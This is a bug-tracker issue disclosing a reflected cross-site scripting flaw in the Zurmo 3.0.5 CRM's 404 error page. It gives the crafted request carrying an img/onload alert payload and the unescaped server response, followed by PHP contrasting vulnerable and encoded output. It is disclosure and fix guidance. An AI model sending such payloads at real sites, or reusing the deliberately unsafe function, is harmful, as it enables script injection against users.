XSS in error response

Issue #375 new
Simon Waters created an issue

In a naive default install of the OpenSource Zurmo 3.0.5 on Debian Jessie it was noted that some 404 error messages are not properly escaped.

This fetch:

GET /app/index.php/accounts/default/autoCompletedcb81%3cimg%20src%3da%20onload%3dalert(1)%3e93a48?term=C HTTP/1.1

Resulted in a reflected XSS attack in the 404 page.

I wondered if this might be fixed in later versions of the Yii framework, as it wasn't immediately apparent what was happening.

HTTP/1.0 404 Not Found
Date: Tue, 22 Dec 2015 00:34:58 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 218
Connection: close
Content-Type: text/html; charset=UTF-8

The system is unable to find the requested action "autoCompletedcb81<img src=a onload=alert(1)>93a48".<script>$('#zurmoSentryId').append('The reference id for this error is d1212d41ec9b45bb91201c6c52a4f98d.');</script>
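The response above shows the two places where untrusted input reaches the page unencoded: the action name dropped straight into the HTML body, and a value concatenated into an inline `<script>`. The following PHP is an added example written for this report, not Zurmo's or Yii's code; the function names are hypothetical, and it assumes only PHP's built-in `htmlspecialchars()`. It places the vulnerable message construction beside a hardened form and keeps the reference id out of script context altogether.

```php
<?php
// Added example (not Zurmo's or Yii's own code). Function names are
// hypothetical. A Yii 1.x application would normally reach for CHtml::encode(),
// which wraps htmlspecialchars() in the same way as encodeHtml() below.

// Vulnerable form: the attacker-controlled action name is concatenated into the
// HTML body verbatim, so a name containing "<img ... onload=...>" becomes live
// markup when the 404 page is rendered. This mirrors the behaviour in the report.
function renderActionNotFoundUnsafe(string $actionId): string
{
    return 'The system is unable to find the requested action "' . $actionId . '".';
}

// Output encoding for an HTML body or attribute context. ENT_QUOTES covers both
// quote styles (the message wraps the value in double quotes), ENT_SUBSTITUTE
// avoids returning an empty string on malformed UTF-8, and naming the charset
// prevents encoding mismatches between the app and the response.
function encodeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened form: the only change is that the untrusted value is encoded at the
// point where it is written into HTML.
function renderActionNotFoundSafe(string $actionId): string
{
    return 'The system is unable to find the requested action "' . encodeHtml($actionId) . '".';
}

// The report's page appends the reference id via an inline <script> built by
// string concatenation. Placing the id in a data attribute instead means no
// untrusted value is ever interpolated into JavaScript; a static script can
// read it from the element afterwards.
function renderReferenceId(string $referenceId): string
{
    return '<div id="zurmoSentryId" data-ref-id="' . encodeHtml($referenceId) . '"></div>';
}

// Constructed sample input shaped like the action name in the report.
$actionId = 'autoCompletedcb81<img src=a onload=alert(1)>93a48';
// Constructed placeholder reference id (not the id from the report).
$referenceId = 'REFERENCE-ID-PLACEHOLDER';

echo renderActionNotFoundUnsafe($actionId), PHP_EOL;
echo renderActionNotFoundSafe($actionId), PHP_EOL;
echo renderReferenceId($referenceId), PHP_EOL;
```

Run with `php example.php`. The unsafe line reproduces the problem from the report (the `<img>` tag survives as markup), while the hardened line emits `&lt;img ... &gt;`, so the browser displays the action name as text rather than executing it. The same rule applies wherever the framework echoes a request-derived value into an error page: encode for the context the value lands in (HTML body, attribute, or script), rather than relying on the 404 path being harmless.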
